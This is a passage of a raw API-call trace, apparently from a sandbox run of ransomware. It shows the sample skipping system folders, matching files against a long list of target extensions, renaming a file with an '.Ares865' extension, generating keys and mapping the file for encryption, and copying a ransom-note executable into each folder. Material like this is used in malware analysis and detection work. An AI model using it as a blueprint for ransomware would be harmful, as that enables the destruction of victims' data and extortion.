[0063.747] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.747] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.747] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.747] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6477260, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6477260, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaa5ffafd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Stars.jpg", cAlternateFileName="")) returned 1 [0063.747] lstrcmpiW (lpString1="Stars.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0063.747] lstrcmpiW (lpString1="Stars.jpg", lpString2="aoldtz.exe") returned 1 [0063.747] lstrcmpiW (lpString1="Stars.jpg", lpString2=".") returned 1 [0063.747] lstrcmpiW (lpString1="Stars.jpg", lpString2="..") returned 1 [0063.747] lstrcmpiW (lpString1="Stars.jpg", lpString2="windows") returned -1 [0063.747] lstrcmpiW (lpString1="Stars.jpg", lpString2="bootmgr") returned 1 [0063.747] lstrcmpiW (lpString1="Stars.jpg", lpString2="temp") returned -1 [0063.747] lstrcmpiW (lpString1="Stars.jpg", lpString2="pagefile.sys") returned 1 [0063.747] lstrcmpiW (lpString1="Stars.jpg", lpString2="boot") returned 1 [0063.747] lstrcmpiW (lpString1="Stars.jpg", lpString2="ids.txt") returned 1 [0063.747] lstrcmpiW (lpString1="Stars.jpg", lpString2="ntuser.dat") returned 1 [0063.747] lstrcmpiW (lpString1="Stars.jpg", lpString2="perflogs") returned 1 [0063.747] lstrcmpiW (lpString1="Stars.jpg", lpString2="MSBuild") returned 1 [0063.747] lstrlenW (lpString="Stars.jpg") returned 9 [0063.747] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 80 [0063.747] lstrcpyW (in: lpString1=0x2cce48e, lpString2="Stars.jpg" | out: lpString1="Stars.jpg") returned="Stars.jpg" [0063.747] lstrlenW (lpString="Stars.jpg") returned 9 [0063.747] lstrlenW (lpString="Ares865") returned 7 [0063.747] lstrcmpiW (lpString1="ars.jpg", lpString2="Ares865") returned 1 [0063.748] lstrlenW (lpString=".dll") returned 4 [0063.748] lstrcmpiW (lpString1="Stars.jpg", lpString2=".dll") returned 1 [0063.748] lstrlenW (lpString=".lnk") returned 4 [0063.748] lstrcmpiW (lpString1="Stars.jpg", lpString2=".lnk") returned 1 [0063.748] lstrlenW (lpString=".ini") returned 4 [0063.748] lstrcmpiW (lpString1="Stars.jpg", lpString2=".ini") returned 1 [0063.748] lstrlenW (lpString=".sys") returned 4 [0063.748] lstrcmpiW (lpString1="Stars.jpg", lpString2=".sys") returned 1 [0063.748] lstrlenW (lpString="Stars.jpg") returned 9 [0063.748] lstrlenW (lpString="bak") returned 3 [0063.748] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0063.748] lstrlenW (lpString="ba_") returned 3 [0063.748] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0063.748] lstrlenW (lpString="dbb") returned 3 [0063.748] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0063.748] lstrlenW (lpString="vmdk") returned 4 [0063.748] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0063.748] lstrlenW (lpString="rar") returned 3 [0063.748] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0063.748] lstrlenW (lpString="zip") returned 3 [0063.748] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0063.748] lstrlenW (lpString="tgz") returned 3 [0063.748] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0063.748] lstrlenW (lpString="vbox") returned 4 [0063.748] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0063.748] lstrlenW (lpString="vdi") returned 3 [0063.748] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0063.748] lstrlenW (lpString="vhd") returned 3 [0063.748] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0063.748] lstrlenW (lpString="vhdx") returned 4 [0063.748] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0063.748] lstrlenW (lpString="avhd") returned 4 [0063.748] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0063.748] lstrlenW (lpString="db") returned 2 [0063.748] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0063.748] lstrlenW (lpString="db2") returned 3 [0063.748] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0063.748] lstrlenW (lpString="db3") returned 3 [0063.748] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0063.749] lstrlenW (lpString="dbf") returned 3 [0063.749] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0063.749] lstrlenW (lpString="mdf") returned 3 [0063.749] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0063.749] lstrlenW (lpString="mdb") returned 3 [0063.749] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0063.749] lstrlenW (lpString="sql") returned 3 [0063.749] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0063.749] lstrlenW (lpString="sqlite") returned 6 [0063.749] lstrcmpiW (lpString1="rs.jpg", lpString2="sqlite") returned -1 [0063.749] lstrlenW (lpString="sqlite3") returned 7 [0063.749] lstrcmpiW (lpString1="ars.jpg", lpString2="sqlite3") returned -1 [0063.749] lstrlenW (lpString="sqlitedb") returned 8 [0063.749] lstrcmpiW (lpString1="tars.jpg", lpString2="sqlitedb") returned 1 [0063.749] lstrlenW (lpString="xml") returned 3 [0063.749] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0063.749] lstrlenW (lpString="$er") returned 3 [0063.749] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0063.749] lstrlenW (lpString="4dd") returned 3 [0063.749] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0063.749] lstrlenW (lpString="4dl") returned 3 [0063.749] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0063.749] lstrlenW (lpString="^^^") returned 3 [0063.749] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0063.749] lstrlenW (lpString="abs") returned 3 [0063.749] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0063.749] lstrlenW (lpString="abx") returned 3 [0063.749] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0063.749] lstrlenW (lpString="accdb") returned 5 [0063.749] lstrcmpiW (lpString1="s.jpg", lpString2="accdb") returned 1 [0063.749] lstrlenW (lpString="accdc") returned 5 [0063.749] lstrcmpiW (lpString1="s.jpg", lpString2="accdc") returned 1 [0063.749] lstrlenW (lpString="accde") returned 5 [0063.749] lstrcmpiW (lpString1="s.jpg", lpString2="accde") returned 1 [0063.749] lstrlenW (lpString="accdr") returned 5 [0063.749] lstrcmpiW (lpString1="s.jpg", lpString2="accdr") returned 1 [0063.749] lstrlenW (lpString="accdt") returned 5 [0063.749] lstrcmpiW (lpString1="s.jpg", lpString2="accdt") returned 1 [0063.750] lstrlenW (lpString="accdw") returned 5 [0063.750] lstrcmpiW (lpString1="s.jpg", lpString2="accdw") returned 1 [0063.750] lstrlenW (lpString="accft") returned 5 [0063.750] lstrcmpiW (lpString1="s.jpg", lpString2="accft") returned 1 [0063.750] lstrlenW (lpString="adb") returned 3 [0063.750] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.750] lstrlenW (lpString="adb") returned 3 [0063.750] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.750] lstrlenW (lpString="ade") returned 3 [0063.750] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0063.750] lstrlenW (lpString="adf") returned 3 [0063.750] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0063.750] lstrlenW (lpString="adn") returned 3 [0063.750] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0063.750] lstrlenW (lpString="adp") returned 3 [0063.750] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0063.750] lstrlenW (lpString="alf") returned 3 [0063.750] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0063.750] lstrlenW (lpString="ask") returned 3 [0063.750] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0063.750] lstrlenW (lpString="btr") returned 3 [0063.750] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0063.750] lstrlenW (lpString="cat") returned 3 [0063.750] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0063.750] lstrlenW (lpString="cdb") returned 3 [0063.750] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0063.750] lstrlenW (lpString="ckp") returned 3 [0063.750] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0063.750] lstrlenW (lpString="cma") returned 3 [0063.750] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0063.750] lstrlenW (lpString="cpd") returned 3 [0063.750] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0063.750] lstrlenW (lpString="dacpac") returned 6 [0063.750] lstrcmpiW (lpString1="rs.jpg", lpString2="dacpac") returned 1 [0063.750] lstrlenW (lpString="dad") returned 3 [0063.750] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0063.750] lstrlenW (lpString="dadiagrams") returned 10 [0063.750] lstrlenW (lpString="daschema") returned 8 [0063.751] lstrcmpiW (lpString1="tars.jpg", lpString2="daschema") returned 1 [0063.751] lstrlenW (lpString="db-journal") returned 10 [0063.751] lstrlenW (lpString="db-shm") returned 6 [0063.751] lstrcmpiW (lpString1="rs.jpg", lpString2="db-shm") returned 1 [0063.751] lstrlenW (lpString="db-wal") returned 6 [0063.751] lstrcmpiW (lpString1="rs.jpg", lpString2="db-wal") returned 1 [0063.751] lstrlenW (lpString="dbc") returned 3 [0063.751] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0063.751] lstrlenW (lpString="dbs") returned 3 [0063.751] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0063.751] lstrlenW (lpString="dbt") returned 3 [0063.751] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0063.751] lstrlenW (lpString="dbv") returned 3 [0063.751] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0063.751] lstrlenW (lpString="dbx") returned 3 [0063.751] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0063.751] lstrlenW (lpString="dcb") returned 3 [0063.751] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0063.752] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.Ares865") returned 88 [0063.752] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\stars.jpg"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\stars.jpg.ares865"), dwFlags=0x1) returned 1 [0063.753] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\stars.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.753] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7505) returned 1 [0063.753] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.753] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.753] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.753] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.754] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.754] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.754] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2060, lpName=0x0) returned 0x164 [0063.755] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2060) returned 0x190000 [0063.757] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.757] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.757] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.758] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.758] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.758] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.758] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.758] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.758] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.758] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0063.758] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.758] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0063.758] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.758] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.758] CloseHandle (hObject=0x164) returned 1 [0063.758] CloseHandle (hObject=0x154) returned 1 [0063.759] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.759] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.759] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.759] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6477260, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6477260, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaa5ffafd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Stars.jpg", cAlternateFileName="")) returned 0 [0063.759] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0063.759] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2288 [0063.759] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup" [0063.759] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0063.759] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0063.759] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup") returned 66 [0063.759] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup" [0063.759] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0063.759] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0063.760] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0063.760] GetLastError () returned 0x0 [0063.760] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0063.760] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0063.760] CloseHandle (hObject=0x12c) returned 1 [0063.760] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0063.760] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.760] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0063.761] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0063.761] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0063.761] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.761] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.761] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0063.761] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0063.761] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.761] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.761] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a89a8c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0063.761] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0063.761] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8e6b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8e6b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="new", cAlternateFileName="")) returned 1 [0063.761] lstrcmpiW (lpString1="new", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0063.761] lstrcmpiW (lpString1="new", lpString2="aoldtz.exe") returned 1 [0063.761] lstrcmpiW (lpString1="new", lpString2=".") returned 1 [0063.761] lstrcmpiW (lpString1="new", lpString2="..") returned 1 [0063.761] lstrcmpiW (lpString1="new", lpString2="windows") returned -1 [0063.761] lstrcmpiW (lpString1="new", lpString2="bootmgr") returned 1 [0063.761] lstrcmpiW (lpString1="new", lpString2="temp") returned -1 [0063.761] lstrcmpiW (lpString1="new", lpString2="pagefile.sys") returned -1 [0063.761] lstrcmpiW (lpString1="new", lpString2="boot") returned 1 [0063.761] lstrcmpiW (lpString1="new", lpString2="ids.txt") returned 1 [0063.761] lstrcmpiW (lpString1="new", lpString2="ntuser.dat") returned -1 [0063.761] lstrcmpiW (lpString1="new", lpString2="perflogs") returned -1 [0063.761] lstrcmpiW (lpString1="new", lpString2="MSBuild") returned 1 [0063.761] lstrlenW (lpString="new") returned 3 [0063.761] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\*") returned 68 [0063.761] lstrcpyW (in: lpString1=0x2cce486, lpString2="new" | out: lpString1="new") returned="new" [0063.761] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2280 [0063.761] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8e) returned 0x2d1ea0 [0063.761] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2288 | out: ListHead=0x2e7710, ListEntry=0x2d2288) returned 0x2d2268 [0063.761] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8e6b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8e6b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="new", cAlternateFileName="")) returned 0 [0063.761] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0063.762] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2288 [0063.762] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new" [0063.762] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0063.762] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0063.762] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new") returned 70 [0063.762] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new" [0063.762] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0063.762] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\backup\\new\\how to back your files.exe"), bFailIfExists=1) returned 0 [0063.762] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0063.762] GetLastError () returned 0x0 [0063.762] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0063.762] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0063.763] CloseHandle (hObject=0x12c) returned 1 [0063.763] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0063.763] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.763] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8e6b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8e6b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0063.763] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0063.763] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0063.763] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.763] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8e6b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8e6b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.763] lstrcmpiW (lpString1="..", 